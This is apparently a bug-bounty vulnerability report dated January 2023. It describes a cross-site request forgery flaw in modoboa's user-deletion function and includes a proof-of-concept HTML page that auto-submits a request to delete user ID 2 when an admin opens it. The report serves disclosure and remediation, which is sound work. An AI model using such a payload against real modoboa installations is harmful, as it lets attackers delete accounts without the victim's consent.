CSRF leading to delete a user in modoboa/modoboa
Jan 18th 2023
The deleting a user functionality is vulnerable to a CSRF attack.
The cause is same with the deleting a domain functionality.
Proof of Concept
- Login as admin.
- Create a user to be deleted. E.g. the user ID is 2.
- Open the following file in the browser.
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/admin/accounts/2/delete/"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
An attacker can force a victim to delete users.